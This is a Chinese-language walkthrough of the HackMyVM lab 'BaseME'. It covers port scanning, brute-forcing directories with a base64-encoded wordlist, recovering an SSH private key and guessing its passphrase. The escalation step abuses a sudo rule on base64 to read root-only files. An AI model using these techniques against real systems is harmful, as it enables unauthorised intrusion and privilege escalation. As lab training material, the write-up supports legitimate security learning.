8.BaseME
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=BaseME
作者:sml
难度:⭐️⭐️
知识点:base64编码扫描、linuxbase64编码自带换行符、
2. 信息收集
端口扫描
──(root㉿kali)-[/home/kali]
└─# nmap -sS 192.168.9.10 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 21:25 CST
Nmap scan report for 192.168.9.10
Host is up (0.00038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:7C:3B:62 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds
上面是一串base64编码的字符串
解码得到
ALL, absolutely ALL that you need is in BASE64.
Including the password that you need :)
Remember, BASE64 has the answer to all your questions.
-lucas
提示我们我们想要的都可以通过base64获取
尝试爆破目录发现没有结果。猜测可能是需要base64加密
3. BASE64编码目录爆破
直接对字典进行逐行base64加密
import base64
def encode\_file\_line\_by\_line(*input\_file*, *output\_file*):
with open(*input\_file*, 'r', *encoding*='utf-8') as infile, open(*output\_file*, 'w', *encoding*='utf-8') as outfile:
for line in infile:
*# 直接对整行(包括换行符)进行 Base64 编码*
encoded\_line = base64.b64encode(line.encode()).decode()
*# 将编码后的内容写入输出文件,并添加换行符*
outfile.write(encoded\_line + '\n')
*# 使用示例*
input\_file = 'dicc.txt' *# 输入文件路径*
output\_file = 'base64\_dicc.txt' *# 输出文件路径*
encode\_file\_line\_by\_line(input\_file, output\_file)
然后爆破
/aWRfcnNhCg==
/cm9ib3RzLnR4dAo=
获取了私钥
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBTxe8YUL
BtzfftAdPgp8YZAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQCZCXvEPnO1
cbhxqctBEcBDZjqrFfolwVKmpBgY07M3CK7pO10UgBsLyYwAzJEw4e6YgPNSyCDWFaNTKG
07jgcgrggre8ePCMNFBCAGaYHmLrFIsKDCLI4NE54t58IUHeXCZz72xTobL/ptLk26RBnh
7bHG1JjGlxOkO6m+1oFNLtNuD2QPl8sbZtEzX4S9nNZ/dpyRpMfmB73rN3yyIylevVDEyv
f7CZ7oRO46uDgFPy5VzkndCeJF2YtZBXf5gjc2fajMXvq+b8ol8RZZ6jHXAhiblBXwpAm4
vLYfxzI27BZFnoteBnbdzwSL5apBF5gYWJAHKj/J6MhDj1GKAFc1AAAD0N9UDTcUxwMt5X
YFIZK8ieBL0NOuwocdgbUuktC21SdnSy6ocW3imM+3mzWjPdoBK/Ho339uPmBWI5sbMrpK
xkZMnl+rcTbgz4swv8gNuKhUc7wTgtrNX+PNMdIALNpsxYLt/l56GK8R4J8fLIU5+MojRs
+1NrYs8J4rnO1qWNoJRZoDlAaYqBV95cXoAEkwUHVustfgxUtrYKp+YPFIgx8okMjJgnbi
NNW3TzxluNi5oUhalH2DJ2khKDGQUi9ROFcsEXeJXt3lgpZZt1hrQDA1o8jTXeS4+dW7nZ
zjf3p0M77b/NvcZE+oXYQ1g5Xp1QSOSbj+tlmw54L7Eqb1UhZgnQ7ZsKCoaY9SuAcqm3E0
IJh+I+Zv1egSMS/DOHIxO3psQkciLjkpa+GtwQMl1ZAJHQaB6q70JJcBCfVsykdY52LKDI
pxZYpLZmyDx8TTaA8JOmvGpfNZkMU4I0i5/ZT65SRFJ1NlBCNwcwtOl9k4PW5LVxNsGRCJ
MJr8k5Ac0CX03fXESpmsUUVS+/Dj/hntHw89dO8HcqqIUEpeEbfTWLvax0CiSh3KjSceJp
+8gUyDGvCkcyVneUQjmmrRswRhTNxxKRBZsekGwHpo8hDYbUEFZqzzLAQbBIAdrl1tt7mV
tVBrmpM6CwJdzYEl21FaK8jvdyCwPr5HUgtuxrSpLvndcnwPaxJWGi4P471DDZeRYDGcWh
i6bICrLQgeJlHaEUmrQC5Rdv03zwI9U8DXUZ/OHb40PL8MXqBtU/b6CEU9JuzJpBrKZ+k+
tSn7hr8hppT2tUSxDvC+USMmw/WDfakjfHpoNwh7Pt5i0cwwpkXFQxJPvR0bLxvXZn+3xw
N7bw45FhBZCsHCAbV2+hVsP0lyxCQOj7yGkBja87S1e0q6WZjjB4SprenHkO7tg5Q0HsuM
Aif/02HHzWG+CR/IGlFsNtq1vylt2x+Y/091vCkROBDawjHz/8ogy2Fzg8JYTeoLkHwDGQ
O+TowA10RATek6ZEIxh6SmtDG/V5zeWCuEmK4sRT3q1FSvpB1/H+FxsGCoPIg8FzciGCh2
TLuskcXiagns9N1RLOnlHhiZd8RZA0Zg7oZIaBvaZnhZYGycpAJpWKebjrtokLYuMfXRLl
3/SAeUl72EA3m1DInxsPguFuk00roMc77N6erY7tjOZLVYPoSiygDR1A7f3zYz+0iFI4rL
ND8ikgmQvF6hrwwJBrp/0xKEaMTCKLvyyZ3eDSdBDPrkThhFwrPpI6+Ex8RvcWI6bTJAWJ
LdmmRXUS/DtO+69/aidvxGAYob+1M=
-----END OPENSSH PRIVATE KEY-----
ssh连上去
提示需要私钥密码
猜测就是开始下面那句话的Base64编码
iloveyou
youloveyou
shelovesyou
helovesyou
weloveyou
theyhatesme
这里直接逐行Base64加密是不行的,后面要加上一个回车才是对的(因为他这里面的编码都是linux里面进行的。linux默认对字符串进行base64编码后面是带有换行符的)
第一个加密就是对的
iloveyou 》aWxvdmV5b3UK
然后就能连接上来了
4. 提权
lucas@baseme:~$ find / -perm -4000 2>/dev/null
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/mount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chsh
/usr/bin/umount
/usr/bin/gpasswd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
lucas@baseme:~$ sudo -l
Matching Defaults entries for lucas on baseme:
env\_reset, mail\_badpass, secure\_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lucas may run the following commands on baseme:
(ALL) NOPASSWD: /usr/bin/base64
lucas@baseme:~$
sudo base64 "/root/root.txt" |base64 --decode
这里应该读取私钥然后连接
我这里直接偷懒读取flag了